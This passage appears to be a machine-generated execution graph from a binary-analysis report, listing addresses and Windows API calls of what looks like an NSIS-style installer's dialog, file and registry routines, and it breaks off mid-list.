                                                                                                                                    execution_graph 3510 404f43 GetDlgItem GetDlgItem 3511 404f95 7 API calls 3510->3511 3519 4051ba 3510->3519 3512 40503c DeleteObject 3511->3512 3513 40502f SendMessageW 3511->3513 3514 405045 3512->3514 3513->3512 3515 40507c 3514->3515 3520 406594 21 API calls 3514->3520 3562 4044d6 3515->3562 3516 40529c 3518 405348 3516->3518 3523 4051ad 3516->3523 3529 4052f5 SendMessageW 3516->3529 3524 405352 SendMessageW 3518->3524 3525 40535a 3518->3525 3519->3516 3544 405229 3519->3544 3567 404e91 SendMessageW 3519->3567 3521 40505e SendMessageW SendMessageW 3520->3521 3521->3514 3522 405090 3528 4044d6 22 API calls 3522->3528 3584 40453d 3523->3584 3524->3525 3532 405373 3525->3532 3533 40536c ImageList_Destroy 3525->3533 3540 405383 3525->3540 3545 4050a1 3528->3545 3529->3523 3535 40530a SendMessageW 3529->3535 3530 40528e SendMessageW 3530->3516 3536 40537c GlobalFree 3532->3536 3532->3540 3533->3532 3534 4054fd 3534->3523 3541 40550f ShowWindow GetDlgItem ShowWindow 3534->3541 3538 40531d 3535->3538 3536->3540 3537 40517c GetWindowLongW SetWindowLongW 3539 405195 3537->3539 3549 40532e SendMessageW 3538->3549 3542 4051b2 3539->3542 3543 40519a ShowWindow 3539->3543 3540->3534 3557 4053be 3540->3557 3572 404f11 3540->3572 3541->3523 3566 40450b SendMessageW 3542->3566 3565 40450b SendMessageW 3543->3565 3544->3516 3544->3530 3545->3537 3548 4050f4 SendMessageW 3545->3548 3550 405177 3545->3550 3551 405132 SendMessageW 3545->3551 3552 405146 SendMessageW 3545->3552 3548->3545 3549->3518 3550->3537 3550->3539 3551->3545 3552->3545 3554 4054c8 3555 4054d3 InvalidateRect 3554->3555 3559 4054df 3554->3559 3555->3559 3556 4053ec SendMessageW 3558 405402 3556->3558 3557->3556 3557->3558 3558->3554 3560 405476 SendMessageW SendMessageW 3558->3560 3559->3534 3581 404e4c 3559->3581 3560->3558 3563 406594 21 API calls 3562->3563 3564 4044e1 SetDlgItemTextW 3563->3564 3564->3522 3565->3523 3566->3519 3568 404ef0 SendMessageW 3567->3568 3569 404eb4 GetMessagePos ScreenToClient SendMessageW 3567->3569 3570 404ee8 3568->3570 3569->3570 3571 404eed 3569->3571 3570->3544 3571->3568 3598 406557 lstrcpynW 3572->3598 3574 404f24 3599 40649e wsprintfW 3574->3599 3576 404f2e 3577 40140b 2 API calls 3576->3577 3578 404f37 3577->3578 3600 406557 lstrcpynW 3578->3600 3580 404f3e 3580->3557 3601 404d83 3581->3601 3583 404e61 3583->3534 3585 404555 GetWindowLongW 3584->3585 3595 404600 3584->3595 3586 40456a 3585->3586 3585->3595 3587 404597 GetSysColor 3586->3587 3588 40459a 3586->3588 3586->3595 3587->3588 3589 4045a0 SetTextColor 3588->3589 3590 4045aa SetBkMode 3588->3590 3589->3590 3591 4045c2 GetSysColor 3590->3591 3592 4045c8 3590->3592 3591->3592 3593 4045d9 3592->3593 3594 4045cf SetBkColor 3592->3594 3593->3595 3596 4045f3 CreateBrushIndirect 3593->3596 3597 4045ec DeleteObject 3593->3597 3594->3593 3596->3595 3597->3596 3598->3574 3599->3576 3600->3580 3602 404d9c 3601->3602 3603 406594 21 API calls 3602->3603 3604 404e00 3603->3604 3605 406594 21 API calls 3604->3605 3606 404e0b 3605->3606 3607 406594 21 API calls 3606->3607 3608 404e21 lstrlenW wsprintfW SetDlgItemTextW 3607->3608 3608->3583 3609 402643 3610 402672 3609->3610 3611 402657 3609->3611 3613 4026a2 3610->3613 3614 402677 3610->3614 3612 402d89 21 API calls 3611->3612 3623 40265e 3612->3623 3616 402dab 21 API calls 3613->3616 3615 402dab 21 API calls 3614->3615 3617 40267e 3615->3617 3618 4026a9 lstrlenW 3616->3618 3626 406579 WideCharToMultiByte 3617->3626 3618->3623 3620 402692 lstrlenA 3620->3623 3621 4026d6 3622 4026ec 3621->3622 3624 4060f9 WriteFile 3621->3624 3623->3621 3623->3622 3627 406128 SetFilePointer 3623->3627 3624->3622 3626->3620 3628 406144 3627->3628 3631 40615c 3627->3631 3629 4060ca ReadFile 3628->3629 3630 406150 3629->3630 3630->3631 3632 406165 SetFilePointer 3630->3632 3633 40618d SetFilePointer 3630->3633 3631->3621 3632->3633 3634 406170 3632->3634 3633->3631 3635 4060f9 WriteFile 3634->3635 3635->3631 3442 4015c6 3443 402dab 21 API calls 3442->3443 3444 4015cd 3443->3444 3445 405ed1 4 API calls 3444->3445 3450 4015d6 3445->3450 3446 401636 3448 401668 3446->3448 3449 40163b 3446->3449 3447 405e53 CharNextW 3447->3450 3452 401423 28 API calls 3448->3452 3462 401423 3449->3462 3450->3446 3450->3447 3455 405b05 2 API calls 3450->3455 3456 405b22 5 API calls 3450->3456 3459 4015ff 3450->3459 3460 40161c GetFileAttributesW 3450->3460 3458 401660 3452->3458 3455->3450 3456->3450 3457 40164f SetCurrentDirectoryW 3457->3458 3459->3450 3461 405aab 2 API calls 3459->3461 3460->3450 3461->3459 3463 4055dc 28 API calls 3462->3463 3464 401431 3463->3464 3465 406557 lstrcpynW 3464->3465 3465->3457 3636 404646 lstrlenW 3637 404665 3636->3637 3638 404667 WideCharToMultiByte 3636->3638 3637->3638 3645 4049c7 3646 4049f3 3645->3646 3647 404a04 3645->3647 3706 405b9b GetDlgItemTextW 3646->3706 3649 404a10 GetDlgItem 3647->3649 3651 404a6f 3647->3651 3650 404a24 3649->3650 3655 404a38 SetWindowTextW 3650->3655 3658 405ed1 4 API calls 3650->3658 3652 404b53 3651->3652 3660 406594 21 API calls 3651->3660 3704 404d02 3651->3704 3652->3704 3708 405b9b GetDlgItemTextW 3652->3708 3653 4049fe 3654 406805 5 API calls 3653->3654 3654->3647 3659 4044d6 22 API calls 3655->3659 3657 40453d 8 API calls 3662 404d16 3657->3662 3663 404a2e 3658->3663 3664 404a54 3659->3664 3665 404ae3 SHBrowseForFolderW 3660->3665 3661 404b83 3666 405f2e 18 API calls 3661->3666 3663->3655 3670 405e26 3 API calls 3663->3670 3667 4044d6 22 API calls 3664->3667 3665->3652 3668 404afb CoTaskMemFree 3665->3668 3669 404b89 3666->3669 3671 404a62 3667->3671 3672 405e26 3 API calls 3668->3672 3709 406557 lstrcpynW 3669->3709 3670->3655 3707 40450b SendMessageW 3671->3707 3679 404b08 3672->3679 3675 404a68 3678 40694b 5 API calls 3675->3678 3676 404b3f SetDlgItemTextW 3676->3652 3677 404ba0 3680 40694b 5 API calls 3677->3680 3678->3651 3679->3676 3681 406594 21 API calls 3679->3681 3687 404ba7 3680->3687 3682 404b27 lstrcmpiW 3681->3682 3682->3676 3684 404b38 lstrcatW 3682->3684 3683 404be8 3710 406557 lstrcpynW 3683->3710 3684->3676 3686 404bef 3688 405ed1 4 API calls 3686->3688 3687->3683 3692 405e72 2 API calls 3687->3692 3693 404c40 3687->3693 3689 404bf5 GetDiskFreeSpaceW 3688->3689 3691 404c19 MulDiv 3689->3691 3689->3693 3691->3693 3692->3687 3694 404cb1 3693->3694 3696 404e4c 24 API calls 3693->3696 3695 404cd4 3694->3695 3697 40140b 2 API calls 3694->3697 3711 4044f8 EnableWindow 3695->3711 3698 404c9e 3696->3698 3697->3695 3700 404cb3 SetDlgItemTextW 3698->3700 3701 404ca3 3698->3701 3700->3694 3702 404d83 24 API calls 3701->3702 3702->3694 3703 404cf0 3703->3704 3712 404920 3703->3712 3704->3657 3706->3653 3707->3675 3708->3661 3709->3677 3710->3686 3711->3703 3713 404933 SendMessageW 3712->3713 3714 40492e 3712->3714 3713->3704 3714->3713 3715 401c48 3716 402d89 21 API calls 3715->3716 3717 401c4f 3716->3717 3718 402d89 21 API calls 3717->3718 3719 401c5c 3718->3719 3720 401c71 3719->3720 3721 402dab 21 API calls 3719->3721 3722 402dab 21 API calls 3720->3722 3726 401c81 3720->3726 3721->3720 3722->3726 3723 401cd8 3725 402dab 21 API calls 3723->3725 3724 401c8c 3727 402d89 21 API calls 3724->3727 3728 401cdd 3725->3728 3726->3723 3726->3724 3729 401c91 3727->3729 3730 402dab 21 API calls 3728->3730 3731 402d89 21 API calls 3729->3731 3733 401ce6 FindWindowExW 3730->3733 3732 401c9d 3731->3732 3734 401cc8 SendMessageW 3732->3734 3735 401caa SendMessageTimeoutW 3732->3735 3736 401d08 3733->3736 3734->3736 3735->3736 3737 4028c9 3738 4028cf 3737->3738 3739 4028d7 FindClose 3738->3739 3740 402c2f 3738->3740 3739->3740 3499 403b4f 3500 403b67 3499->3500 3501 403b59 CloseHandle 3499->3501 3506 403b94 3500->3506 3501->3500 3504 405c63 71 API calls 3505 403b78 3504->3505 3507 403ba2 3506->3507 3508 403ba7 FreeLibrary GlobalFree 3507->3508 3509 403b6c 3507->3509 3508->3508 3508->3509 3509->3504 3744 405550 3745 405560 3744->3745 3746 405574 3744->3746 3748 405566 3745->3748 3749 4055bd 3745->3749 3747 40557c IsWindowVisible 3746->3747 3755 405593 3746->3755 3747->3749 3751 405589 3747->3751 3750 404522 SendMessageW 3748->3750 3752 4055c2 CallWindowProcW 3749->3752 3753 405570 3750->3753 3754 404e91 5 API calls 3751->3754 3752->3753 3754->3755 3755->3752 3756 404f11 4 API calls 3755->3756 3756->3749 3757 4016d1 3758 402dab 21 API calls 3757->3758 3759 4016d7 GetFullPathNameW 3758->3759 3760 4016f1 3759->3760 3761 401713 3759->3761 3760->3761 3764 4068b4 2 API calls 3760->3764 3762 401728 GetShortPathNameW 3761->3762 3763 402c2f 3761->3763 3762->3763 3765 401703 3764->3765 3765->3761 3767 406557 lstrcpynW 3765->3767 3767->3761 3768 401e53 GetDC 3769 402d89 21 API calls 3768->3769 3770 401e65 GetDeviceCaps MulDiv ReleaseDC 3769->3770 3771 402d89 21 API calls 3770->3771 3772 401e96 3771->3772 3773 406594 21 API calls 3772->3773 3774 401ed3 CreateFontIndirectW 3773->3774 3775 40263d 3774->3775 3776 402955 3777 402dab 21 API calls 3776->3777 3778 402961 3777->3778 3779 402977 3778->3779 3780 402dab 21 API calls 3778->3780 3781 406022 2 API calls 3779->3781 3780->3779 3782 40297d 3781->3782 3804 406047 GetFileAttributesW CreateFileW 3782->3804 3784 40298a 3785 402a40 3784->3785 3788 4029a5 GlobalAlloc 3784->3788 3789 402a28 3784->3789 3786 402a47 DeleteFileW 3785->3786 3787 402a5a 3785->3787 3786->3787 3788->3789 3790 4029be 3788->3790 3791 4032b9 35 API calls 3789->3791 3805 4034ea SetFilePointer 3790->3805 3793 402a35 CloseHandle 3791->3793 3793->3785 3794 4029c4 3795 4034d4 ReadFile 3794->3795 3796 4029cd GlobalAlloc 3795->3796 3797 402a11 3796->3797 3798 4029dd 3796->3798 3800 4060f9 WriteFile 3797->3800 3799 4032b9 35 API calls 3798->3799 3802 4029ea 3799->3802 3801 402a1d GlobalFree 3800->3801 3801->3789 3803 402a08 GlobalFree 3802->3803 3803->3797 3804->3784 3805->3794 3466 4014d7 3471 402d89 3466->3471 3468 4014dd Sleep 3470 402c2f 3468->3470 3472 406594 21 API calls 3471->3472 3473 402d9e 3472->3473 3473->3468 3806 403fd7 3807 404150 3806->3807 3808 403fef 3806->3808 3809 404161 GetDlgItem GetDlgItem 3807->3809 3810 4041a1 3807->3810 3808->3807 3811 403ffb 3808->3811 3814 4044d6 22 API calls 3809->3814 3815 4041fb 3810->3815 3825 401389 2 API calls 3810->3825 3812 404006 SetWindowPos 3811->3812 3813 404019 3811->3813 3812->3813 3817 404022 ShowWindow 3813->3817 3818 404064 3813->3818 3819 40418b SetClassLongW 3814->3819 3816 404522 SendMessageW 3815->3816 3826 40414b 3815->3826 3848 40420d 3816->3848 3820 404042 GetWindowLongW 3817->3820 3821 40410e 3817->3821 3822 404083 3818->3822 3823 40406c DestroyWindow 3818->3823 3824 40140b 2 API calls 3819->3824 3820->3821 3828 40405b ShowWindow 3820->3828 3827 40453d 8 API calls 3821->3827 3830 404088 SetWindowLongW 3822->3830 3831 404099 3822->3831 3829 40445f 3823->3829 3824->3810 3832 4041d3 3825->3832 3827->3826 3828->3818 3829->3826 3837 404490 ShowWindow 3829->3837 3830->3826 3831->3821 3835 4040a5 GetDlgItem 3831->3835 3832->3815 3836 4041d7 SendMessageW 3832->3836 3833 40140b 2 API calls 3833->3848 3834 404461 DestroyWindow EndDialog 3834->3829 3838 4040d3 3835->3838 3839 4040b6 SendMessageW IsWindowEnabled 3835->3839 3836->3826 3837->3826 3841 4040e0 3838->3841 3842 404127 SendMessageW 3838->3842 3843 4040f3 3838->3843 3851 4040d8 3838->3851 3839->3826 3839->3838 3840 406594 21 API calls 3840->3848 3841->3842 3841->3851 3842->3821 3846 404110 3843->3846 3847 4040fb 3843->3847 3845 4044d6 22 API calls 3845->3848 3850 40140b 2 API calls 3846->3850 3849 40140b 2 API calls 3847->3849 3848->3826 3848->3833 3848->3834 3848->3840 3848->3845 3852 4044d6 22 API calls 3848->3852 3868 4043a1 DestroyWindow 3848->3868 3849->3851 3850->3851 3851->3821 3877 4044af 3851->3877 3853 404288 GetDlgItem 3852->3853 3854 4042a5 ShowWindow EnableWindow 3853->3854 3855 40429d 3853->3855 3880 4044f8 EnableWindow 3854->3880 3855->3854 3857 4042cf EnableWindow 3862 4042e3 3857->3862 3858 4042e8 GetSystemMenu EnableMenuItem SendMessageW 3859 404318 SendMessageW 3858->3859 3858->3862 3859->3862 3861 403fb8 22 API calls 3861->3862 3862->3858 3862->3861 3881 40450b SendMessageW 3862->3881 3882 406557 lstrcpynW 3862->3882 3864 404347 lstrlenW 3865 406594 21 API calls 3864->3865 3866 40435d SetWindowTextW 3865->3866 3867 401389 2 API calls 3866->3867 3867->3848 3868->3829 3869 4043bb CreateDialogParamW 3868->3869 3869->3829 3870 4043ee 3869->3870 3871 4044d6 22 API calls 3870->3871 3872 4043f9 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3871->3872 3873 401389 2 API calls 3872->3873 3874 40443f 3873->3874 3874->3826 3875 404447 ShowWindow 3874->3875 3876 404522 SendMessageW 3875->3876 3876->3829 3878 4044b6 3877->3878 3879 4044bc SendMessageW 3877->3879 3878->3879 3879->3821 3880->3857 3881->3862 3882->3864 3883 40195b 3884 402dab 21 API calls 3883->3884 3885 401962 lstrlenW 3884->3885 3886 40263d 3885->3886 3887 4020dd 3888 4021a1 3887->3888 3889 4020ef 3887->3889 3891 401423 28 API calls 3888->3891 3890 402dab 21 API calls 3889->3890 3892 4020f6 3890->3892 3898 4022fb 3891->3898 3893 402dab 21 API calls 3892->3893 3894 4020ff 3893->3894 3895 402115 LoadLibraryExW 3894->3895 3896 402107 GetModuleHandleW 3894->3896 3895->3888 3897 402126 3895->3897 3896->3895 3896->3897 3907 4069ba 3897->3907 3901 402170 3903 4055dc 28 API calls 3901->3903 3902 402137 3904 401423 28 API calls 3902->3904 3905 402147 3902->3905 3903->3905 3904->3905 3905->3898 3906 402193 FreeLibrary 3905->3906 3906->3898 3912 406579 WideCharToMultiByte 3907->3912 3909 4069d7 3910 402131 3909->3910 3911 4069de GetProcAddress 3909->3911 3910->3901 3910->3902 3911->3910 3912->3909 3913 402b5e 3914 402bb0 3913->3914 3915 402b65 3913->3915 3916 40694b 5 API calls 3914->3916 3918 402d89 21 API calls 3915->3918 3921 402bae 3915->3921 3917 402bb7 3916->3917 3919 402dab 21 API calls 3917->3919 3920 402b73 3918->3920 3922 402bc0 3919->3922 3923 402d89 21 API calls 3920->3923 3922->3921 3924 402bc4 IIDFromString 3922->3924 3927 402b7f 3923->3927 3924->3921 3925 402bd3 3924->3925 3925->3921 3931 406557 lstrcpynW 3925->3931 3930 40649e wsprintfW 3927->3930 3928 402bf0 CoTaskMemFree 3928->3921 3930->3921 3931->3928 3932 401761 3933 402dab 21 API calls 3932->3933 3934 401768 3933->3934 3935 406076 2 API calls 3934->3935 3936 40176f 3935->3936 3936->3936 3937 401d62 3938 402d89 21 API calls 3937->3938 3939 401d73 SetWindowLongW 3938->3939 3940 402c2f 3939->3940 3941 4028e3 3942 4028eb 3941->3942 3943 4028ef FindNextFileW 3942->3943 3946 402901 3942->3946 3944 402948 3943->3944 3943->3946 3947 406557 lstrcpynW 3944->3947 3947->3946 3948 403be7 3949 403bf2 3948->3949 3950 403bf9 GlobalAlloc 3949->3950 3951 403bf6 3949->3951 3950->3951 3952 401568 3953 402ba9 3952->3953 3956 40649e wsprintfW 3953->3956 3955 402bae 3956->3955 3957 40196d 3958 402d89 21 API calls 3957->3958 3959 401974 3958->3959 3960 402d89 21 API calls 3959->3960 3961 401981 3960->3961 3962 402dab 21 API calls 3961->3962 3963 401998 lstrlenW 3962->3963 3965 4019a9 3963->3965 3964 4019ea 3965->3964 3969 406557 lstrcpynW 3965->3969 3967 4019da 3967->3964 3968 4019df lstrlenW 3967->3968 3968->3964 3969->3967 3970 40166f 3971 402dab 21 API calls 3970->3971 3972 401675 3971->3972 3973 4068b4 2 API calls 3972->3973 3974 40167b 3973->3974 3975 402af0 3976 402d89 21 API calls 3975->3976 3977 402af6 3976->3977 3978 406594 21 API calls 3977->3978 3979 402933 3977->3979 3978->3979 3980 4026f1 3981 402d89 21 API calls 3980->3981 3988 402700 3981->3988 3982 40283d 3983 40274a ReadFile 3983->3982 3983->3988 3984 4060ca ReadFile 3984->3988 3985 40278a MultiByteToWideChar 3985->3988 3986 40283f 3993 40649e wsprintfW 3986->3993 3987 406128 5 API calls 3987->3988 3988->3982 3988->3983 3988->3984 3988->3985 3988->3986 3988->3987 3990 4027b0 SetFilePointer MultiByteToWideChar 3988->3990 3992 402850 3988->3992 3990->3988 3991 402871 SetFilePointer 3991->3982 3992->3982 3992->3991 3993->3982 3394 401774 3433 402dab 3394->3433 3396 40177b 3397 4017a3 3396->3397 3398 40179b 3396->3398 3441 406557 lstrcpynW 3397->3441 3440 406557 lstrcpynW 3398->3440 3401 4017a1 3405 406805 5 API calls 3401->3405 3402 4017ae 3403 405e26 3 API calls 3402->3403 3404 4017b4 lstrcatW 3403->3404 3404->3401 3416 4017c0 3405->3416 3406 4017c6 3407 4068b4 2 API calls 3406->3407 3410 4017d2 CompareFileTime 3406->3410 3406->3416 3407->3406 3408 406022 2 API calls 3408->3416 3410->3406 3411 401892 3412 4055dc 28 API calls 3411->3412 3414 40189c 3412->3414 3413 4055dc 28 API calls 3415 40187e 3413->3415 3417 4032b9 35 API calls 3414->3417 3416->3406 3416->3408 3416->3411 3420 406594 21 API calls 3416->3420 3425 406557 lstrcpynW 3416->3425 3430 405bb7 MessageBoxIndirectW 3416->3430 3431 401869 3416->3431 3439 406047 GetFileAttributesW CreateFileW 3416->3439 3418 4018af 3417->3418 3419 4018c3 SetFileTime 3418->3419 3421 4018d5 FindCloseChangeNotification 3418->3421 3419->3421 3420->3416 3421->3415 3422 4018e6 3421->3422 3423 4018eb 3422->3423 3424 4018fe 3422->3424 3426 406594 21 API calls 3423->3426 3427 406594 21 API calls 3424->3427 3425->3416 3428 4018f3 lstrcatW 3426->3428 3429 401906 3427->3429 3428->3429 3432 405bb7 MessageBoxIndirectW 3429->3432 3430->3416 3431->3413 3431->3415 3432->3415 3434 402db7 3433->3434 3435 406594 21 API calls 3434->3435 3436 402dd8 3435->3436 3437 402de4 3436->3437 3438 406805 5 API calls 3436->3438 3437->3396 3438->3437 3439->3416 3440->3401 3441->3402 3994 4014f5 SetForegroundWindow 3995 402c2f 3994->3995 3996 401a77 3997 402d89 21 API calls 3996->3997 3998 401a80 3997->3998 3999 402d89 21 API calls 3998->3999 4000 401a25 3999->4000 4001 401578 4002 401591 4001->4002 4003 401588 ShowWindow 4001->4003 4004 402c2f 4002->4004 4005 40159f ShowWindow 4002->4005 4003->4002 4005->4004 4006 4023f9 4007 402dab 21 API calls 4006->4007 4008 402408 4007->4008 4009 402dab 21 API calls 4008->4009 4010 402411 4009->4010 4011 402dab 21 API calls 4010->4011 4012 40241b GetPrivateProfileStringW 4011->4012 4013 401ffb 4014 402dab 21 API calls 4013->4014 4015 402002 4014->4015 4016 4068b4 2 API calls 4015->4016 4017 402008 4016->4017 4019 402019 4017->4019 4020 40649e wsprintfW 4017->4020 4020->4019 4021 401b7c 4022 402dab 21 API calls 4021->4022 4023 401b83 4022->4023 4024 402d89 21 API calls 4023->4024 4025 401b8c wsprintfW 4024->4025 4026 402c2f 4025->4026 4027 401000 4028 401037 BeginPaint GetClientRect 4027->4028 4029 40100c DefWindowProcW 4027->4029 4031 4010f3 4028->4031 4034 401179 4029->4034 4032 401073 CreateBrushIndirect FillRect DeleteObject 4031->4032 4033 4010fc 4031->4033 4032->4031 4035 401102 CreateFontIndirectW 4033->4035 4036 401167 EndPaint 4033->4036 4035->4036 4037 401112 6 API calls 4035->4037 4036->4034 4037->4036 4038 404980 4039 404990 4038->4039 4040 4049b6 4038->4040 4041 4044d6 22 API calls 4039->4041 4042 40453d 8 API calls 4040->4042 4043 40499d SetDlgItemTextW 4041->4043 4044 4049c2 4042->4044 4043->4040 4045 401680 4046 402dab 21 API calls 4045->4046 4047 401687 4046->4047 4048 402dab 21 API calls 4047->4048 4049 401690 4048->4049 4050 402dab 21 API calls 4049->4050 4051 401699 MoveFileW 4050->4051 4052 4016a5 4051->4052 4053 4016ac 4051->4053 4055 401423 28 API calls 4052->4055 4054 4068b4 2 API calls 4053->4054 4057 4022fb 4053->4057 4056 4016bb 4054->4056 4055->4057 4056->4057 4058 406317 40 API calls 4056->4058 4058->4052 4059 401503 4060 401508 4059->4060 4062 401520 4059->4062 4061 402d89 21 API calls 4060->4061 4061->4062 4063 401a04 4064 402dab 21 API calls 4063->4064 4065 401a0b 4064->4065 4066 402dab 21 API calls 4065->4066 4067 401a14 4066->4067 4068 401a1b lstrcmpiW 4067->4068 4069 401a2d lstrcmpW 4067->4069 4070 401a21 4068->4070 4069->4070 4071 402304 4072 402dab 21 API calls 4071->4072 4073 40230a 4072->4073 4074 402dab 21 API calls 4073->4074 4075 402313 4074->4075 4076 402dab 21 API calls 4075->4076 4077 40231c 4076->4077 4078 4068b4 2 API calls 4077->4078 4079 402325 4078->4079 4080 402336 lstrlenW lstrlenW 4079->4080 4084 402329 4079->4084 4082 4055dc 28 API calls 4080->4082 4081 4055dc 28 API calls 4085 402331 4081->4085 4083 402374 SHFileOperationW 4082->4083 4083->4084 4083->4085 4084->4081 4084->4085 4086 401d86 4087 401d99 GetDlgItem 4086->4087 4088 401d8c 4086->4088 4089 401d93 4087->4089 4090 402d89 21 API calls 4088->4090 4091 401dda GetClientRect LoadImageW SendMessageW 4089->4091 4092 402dab 21 API calls 4089->4092 4090->4089 4094 401e38 4091->4094 4096 401e44 4091->4096 4092->4091 4095 401e3d DeleteObject 4094->4095 4094->4096 4095->4096 4097 402388 4098 4023a2 4097->4098 4099 40238f 4097->4099 4100 406594 21 API calls 4099->4100 4101 40239c 4100->4101 4102 405bb7 MessageBoxIndirectW 4101->4102 4102->4098 3474 401389 3476 401390 3474->3476 3475 4013fe 3476->3475 3477 4013cb MulDiv SendMessageW 3476->3477 3477->3476 4103 402c0a SendMessageW 4104 402c24 InvalidateRect 4103->4104 4105 402c2f 4103->4105 4104->4105 4106 40460c lstrcpynW lstrlenW 4107 40248f 4108 402dab 21 API calls 4107->4108 4109 4024a1 4108->4109 4110 402dab 21 API calls 4109->4110 4111 4024ab 4110->4111 4124 402e3b 4111->4124 4114 4024e3 4116 4024ef 4114->4116 4119 402d89 21 API calls 4114->4119 4115 402dab 21 API calls 4118 4024d9 lstrlenW 4115->4118 4120 40250e RegSetValueExW 4116->4120 4121 4032b9 35 API calls 4116->4121 4117 402933 4118->4114 4119->4116 4122 402524 RegCloseKey 4120->4122 4121->4120 4122->4117 4125 402e56 4124->4125 4128 4063f2 4125->4128 4129 406401 4128->4129 4130 4024bb 4129->4130 4131 40640c RegCreateKeyExW 4129->4131 4130->4114 4130->4115 4130->4117 4131->4130 4132 402910 4133 402dab 21 API calls 4132->4133 4134 402917 FindFirstFileW 4133->4134 4135 40292a 4134->4135 4136 40293f 4134->4136 4140 40649e wsprintfW 4136->4140 4138 402948 4141 406557 lstrcpynW 4138->4141 4140->4138 4141->4135 4142 401911 4143 401948 4142->4143 4144 402dab 21 API calls 4143->4144 4145 40194d 4144->4145 4146 405c63 71 API calls 4145->4146 4147 401956 4146->4147 4148 401491 4149 4055dc 28 API calls 4148->4149 4150 401498 4149->4150 4151 401914 4152 402dab 21 API calls 4151->4152 4153 40191b 4152->4153 4154 405bb7 MessageBoxIndirectW 4153->4154 4155 401924 4154->4155 4156 404695 4157 4046ad 4156->4157 4160 4047c7 4156->4160 4161 4044d6 22 API calls 4157->4161 4158 404831 4159 40483b GetDlgItem 4158->4159 4162 4048fb 4158->4162 4163 404855 4159->4163 4164 4048bc 4159->4164 4160->4158 4160->4162 4165 404802 GetDlgItem SendMessageW 4160->4165 4166 404714 4161->4166 4167 40453d 8 API calls 4162->4167 4163->4164 4171 40487b SendMessageW LoadCursorW SetCursor 4163->4171 4164->4162 4172 4048ce 4164->4172 4189 4044f8 EnableWindow 4165->4189 4169 4044d6 22 API calls 4166->4169 4170 4048f6 4167->4170 4176 404721 CheckDlgButton 4169->4176 4190 404944 4171->4190 4173 4048e4 4172->4173 4174 4048d4 SendMessageW 4172->4174 4173->4170 4178 4048ea SendMessageW 4173->4178 4174->4173 4175 40482c 4179 404920 SendMessageW 4175->4179 4187 4044f8 EnableWindow 4176->4187 4178->4170 4179->4158 4182 40473f GetDlgItem 4188 40450b SendMessageW 4182->4188 4184 404755 SendMessageW 4185 404772 GetSysColor 4184->4185 4186 40477b SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4184->4186 4185->4186 4186->4170 4187->4182 4188->4184 4189->4175 4193 405b7d ShellExecuteExW 4190->4193 4192 4048aa LoadCursorW SetCursor 4192->4164 4193->4192 4194 402896 4195 40289d 4194->4195 4196 402bae 4194->4196 4197 402d89 21 API calls 4195->4197 4198 4028a4 4197->4198 4199 4028b3 SetFilePointer 4198->4199 4199->4196 4200 4028c3 4199->4200 4202 40649e wsprintfW 4200->4202 4202->4196 4203 401f17 4204 402dab 21 API calls 4203->4204 4205 401f1d 4204->4205 4206 402dab 21 API calls 4205->4206 4207 401f26 4206->4207 4208 402dab 21 API calls 4207->4208 4209 401f2f 4208->4209 4210 402dab 21 API calls 4209->4210 4211 401f38 4210->4211 4212 401423 28 API calls 4211->4212 4213 401f3f 4212->4213 4220 405b7d ShellExecuteExW 4213->4220 4215 401f87 4216 4069f6 5 API calls 4215->4216 4218 402933 4215->4218 4217 401fa4 CloseHandle 4216->4217 4217->4218 4220->4215 4221 402f98 4222 402faa SetTimer 4221->4222 4224 402fc3 4221->4224 4222->4224 4223 403018 4224->4223 4225 402fdd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4224->4225 4225->4223 4226 40571b 4227 4058c5 4226->4227 4228 40573c GetDlgItem GetDlgItem GetDlgItem 4226->4228 4230 4058f6 4227->4230 4231 4058ce GetDlgItem CreateThread CloseHandle 4227->4231 4271 40450b SendMessageW 4228->4271 4233 405921 4230->4233 4234 405946 4230->4234 4235 40590d ShowWindow ShowWindow 4230->4235 4231->4230 4232 4057ac 4238 4057b3 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4232->4238 4236 405981 4233->4236 4240 405935 4233->4240 4241 40595b ShowWindow 4233->4241 4237 40453d 8 API calls 4234->4237 4273 40450b SendMessageW 4235->4273 4236->4234 4248 40598f SendMessageW 4236->4248 4243 405954 4237->4243 4246 405821 4238->4246 4247 405805 SendMessageW SendMessageW 4238->4247 4242 4044af SendMessageW 4240->4242 4244 40597b 4241->4244 4245 40596d 4241->4245 4242->4234 4250 4044af SendMessageW 4244->4250 4249 4055dc 28 API calls 4245->4249 4251 405834 4246->4251 4252 405826 SendMessageW 4246->4252 4247->4246 4248->4243 4253 4059a8 CreatePopupMenu 4248->4253 4249->4244 4250->4236 4255 4044d6 22 API calls 4251->4255 4252->4251 4254 406594 21 API calls 4253->4254 4256 4059b8 AppendMenuW 4254->4256 4257 405844 4255->4257 4260 4059d5 GetWindowRect 4256->4260 4261 4059e8 TrackPopupMenu 4256->4261 4258 405881 GetDlgItem SendMessageW 4257->4258 4259 40584d ShowWindow 4257->4259 4258->4243 4265 4058a8 SendMessageW SendMessageW 4258->4265 4262 405870 4259->4262 4263 405863 ShowWindow 4259->4263 4260->4261 4261->4243 4264 405a03 4261->4264 4272 40450b SendMessageW 4262->4272 4263->4262 4266 405a1f SendMessageW 4264->4266 4265->4243 4266->4266 4267 405a3c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4266->4267 4269 405a61 SendMessageW 4267->4269 4269->4269 4270 405a8a GlobalUnlock SetClipboardData CloseClipboard 4269->4270 4270->4243 4271->4232 4272->4258 4273->4233 4274 401d1c 4275 402d89 21 API calls 4274->4275 4276 401d22 IsWindow 4275->4276 4277 401a25 4276->4277 4278 404d1d 4279 404d49 4278->4279 4280 404d2d 4278->4280 4281 404d7c 4279->4281 4282 404d4f SHGetPathFromIDListW 4279->4282 4289 405b9b GetDlgItemTextW 4280->4289 4284 404d5f 4282->4284 4288 404d66 SendMessageW 4282->4288 4286 40140b 2 API calls 4284->4286 4285 404d3a SendMessageW 4285->4279 4286->4288 4288->4281 4289->4285 4290 40149e 4291 4023a2 4290->4291 4292 4014ac PostQuitMessage 4290->4292 4292->4291 4293 401ba0 4294 401bf1 4293->4294 4295 401bad 4293->4295 4297 401bf6 4294->4297 4298 401c1b GlobalAlloc 4294->4298 4296 401c36 4295->4296 4302 401bc4 4295->4302 4299 406594 21 API calls 4296->4299 4311 4023a2 4296->4311 4297->4311 4314 406557 lstrcpynW 4297->4314 4300 406594 21 API calls 4298->4300 4301 40239c 4299->4301 4300->4296 4306 405bb7 